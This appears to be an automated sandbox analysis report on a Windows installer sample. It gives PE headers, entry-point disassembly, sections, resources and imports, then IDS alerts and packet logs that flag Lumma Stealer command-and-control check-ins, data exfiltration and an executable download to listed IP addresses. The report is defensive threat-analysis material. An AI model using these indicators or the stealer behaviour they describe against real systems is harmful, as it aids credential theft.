                                                                                                                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                                                            Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                                                            mov eax, 00500930h
                                                                                                                                                                                                                                                            call 00007FD71CE4A1A6h
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007FD71CE4B051h
                                                                                                                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push FFFFFFECh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            call 00007FD71CE4B2A6h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            push ebp
                                                                                                                                                                                                                                                            push 00502653h
                                                                                                                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                                                            push 00000001h
                                                                                                                                                                                                                                                            call 00007FD71CE4A9F1h
                                                                                                                                                                                                                                                            call 00007FD71CF4188Ch
                                                                                                                                                                                                                                                            mov eax, dword ptr [00500568h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            push 005005CCh
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            call 00007FD71CEBD67Dh
                                                                                                                                                                                                                                                            call 00007FD71CF418E0h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            pop edx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                                                                                                                            jmp 00007FD71CF4385Bh
                                                                                                                                                                                                                                                            jmp 00007FD71CE458CDh
                                                                                                                                                                                                                                                            call 00007FD71CF4165Ch
                                                                                                                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                                                                                                                            call 00007FD71CE4638Eh
                                                                                                                                                                                                                                                            call 00007FD71CE45D11h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, 005027E8h
                                                                                                                                                                                                                                                            call 00007FD71CEBD188h
                                                                                                                                                                                                                                                            push 00000005h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax+00000170h]
                                                                                                                                                                                                                                                            push eax
                                                                                                                                                                                                                                                            call 00007FD71CE4B267h
                                                                                                                                                                                                                                                            mov eax, dword ptr [00505E5Ch]
                                                                                                                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                            mov edx, dword ptr [004DACA0h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10e000 | 0x3840 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x114000 | 0x6ac00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x113000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10ea80 | 0x88c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xffdc8 | 0xffe00 | 3519a31224f088b9e2b9951985b3e485 | False | 0.48290276166340984 | data | 6.485132585729415 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x101000 | 0x17f4 | 0x1800 | 8e0d52126a75001416d71c23878be2c1 | False | 0.5244140625 | data | 6.003729381717893 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x103000 | 0x308c | 0x3200 | c2acc8e96fc244753abd1d87bb624bc0 | False | 0.425078125 | data | 4.3575606000501415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x107000 | 0x6198 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x10e000 | 0x3840 | 0x3a00 | 0e1e8128f777a5ff18a144305a4fb39c | False | 0.3108836206896552 | data | 5.2048781278956655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x112000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x113000 | 0x18 | 0x200 | 9cf98ea6bb17a35d99fa770a2e9a8ff0 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x114000 | 0x6ac00 | 0x6ac00 | a6972768feabccd18590b0645ee0551f | False | 0.578031231703747 | data | 7.370221623166918 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x114c44 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x114d78 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x114eac | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x114fe0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x115114 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x115248 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x11537c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1154b0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 |  |  | 0.2945859872611465
RT_BITMAP | 0x115998 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 |  |  | 0.521551724137931
RT_ICON | 0x115a80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675
RT_ICON | 0x115ba8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179
RT_ICON | 0x116110 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548
RT_ICON | 0x1163f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516
RT_STRING | 0x116ca0 | 0xec | data |  |  | 0.6059322033898306
RT_STRING | 0x116d8c | 0x250 | data |  |  | 0.47466216216216217
RT_STRING | 0x116fdc | 0x28c | data |  |  | 0.4647239263803681
RT_STRING | 0x117268 | 0x3e4 | data |  |  | 0.4347389558232932
RT_STRING | 0x11764c | 0x9c | data |  |  | 0.717948717948718
RT_STRING | 0x1176e8 | 0xe8 | data |  |  | 0.6293103448275862
RT_STRING | 0x1177d0 | 0x468 | data |  |  | 0.3820921985815603
RT_STRING | 0x117c38 | 0x38c | data |  |  | 0.3898678414096916
RT_STRING | 0x117fc4 | 0x3dc | data |  |  | 0.39271255060728744
RT_STRING | 0x1183a0 | 0x360 | data |  |  | 0.37037037037037035
RT_STRING | 0x118700 | 0x40c | data |  |  | 0.3783783783783784
RT_STRING | 0x118b0c | 0x108 | data |  |  | 0.5113636363636364
RT_STRING | 0x118c14 | 0xcc | data |  |  | 0.6029411764705882
RT_STRING | 0x118ce0 | 0x234 | data |  |  | 0.5070921985815603
RT_STRING | 0x118f14 | 0x3c8 | data |  |  | 0.3181818181818182
RT_STRING | 0x1192dc | 0x32c | data |  |  | 0.43349753694581283
RT_STRING | 0x119608 | 0x2a0 | data |  |  | 0.41964285714285715
RT_RCDATA | 0x1198a8 | 0x82e8 | data | English | United States | 0.11261637622344235
RT_RCDATA | 0x121b90 | 0x10 | data |  |  | 1.5
RT_RCDATA | 0x121ba0 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333
RT_RCDATA | 0x1233a0 | 0x6bc | data |  |  | 0.6467517401392111
RT_RCDATA | 0x123a5c | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947
RT_RCDATA | 0x12956c | 0x125 | Delphi compiled form 'TMainForm' |  |  | 0.7508532423208191
RT_RCDATA | 0x129694 | 0x3a2 | Delphi compiled form 'TNewDiskForm' |  |  | 0.524731182795699
RT_RCDATA | 0x129a38 | 0x320 | Delphi compiled form 'TSelectFolderForm' |  |  | 0.53625
RT_RCDATA | 0x129d58 | 0x300 | Delphi compiled form 'TSelectLanguageForm' |  |  | 0.5703125
RT_RCDATA | 0x12a058 | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' |  |  | 0.4562458249832999
RT_RCDATA | 0x12a634 | 0x461 | Delphi compiled form 'TUninstSharedFileForm' |  |  | 0.4335414808206958
RT_RCDATA | 0x12aa98 | 0x2092 | Delphi compiled form 'TWizardForm' |  |  | 0.2299112497001679
RT_GROUP_CURSOR | 0x12cb2c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x12cb40 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x12cb54 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cb68 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cb7c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cb90 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x12cba4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x12cbb8 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x12cbf8 | 0x15c | data | English | United States | 0.5689655172413793
RT_MANIFEST | 0x12cd54 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924
                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                                                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                                                                                                                            user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                                                                                                                                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                                                                                                                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                                                                                                                                            user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, 
GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll | AlphaBlend
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll | InitCommonControls
kernel32.dll | Sleep
oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW
ole32.dll | CoDisconnectObject
advapi32.dll | AdjustTokenPrivileges
oleaut32.dll | SysFreeString
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-01T19:04:08.344709+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:08.816400+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:08.816400+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:09.311045+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:09.783359+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:09.783359+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:11.270377+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:12.448901+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:14.278008+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:15.682517+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:17.006219+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:17.558778+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49741 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:18.066412+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:18.594781+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49743 | 172.67.198.102 | 443 | TCP
2025-01-01T19:04:19.451220+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 185.161.251.21 | 443 | TCP
2025-01-01T19:04:20.291151+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 104.21.37.128 | 443 | TCP
2025-01-01T19:04:20.680174+0100 | 2008438 | ET MALWARE Possible Windows executable sent when remote host claims to send a Text File | 1 | 104.21.37.128 | 443 | 192.168.2.4 | 49745 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718259096 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718293905 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718389034 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718750954 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:10.718764067 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.270279884 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.270376921 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.272243977 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.272249937 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.272459984 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274406910 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274566889 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274595976 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274647951 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.274653912 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830346107 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830427885 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830483913 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830797911 CET49732443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.830809116 CET44349732172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.965522051 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.965593100 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.965662003 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.966074944 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:11.966094017 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.448832989 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.448900938 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.451247931 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.451256037 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.451494932 CET44349733172.67.198.102192.168.2.4
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.453174114 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.453293085 CET49733443192.168.2.4172.67.198.102
                                                                                                                                                                                                                                                            Jan 1, 2025 19:04:12.453325033 CET44349733172.67.198.102192.168.2.4
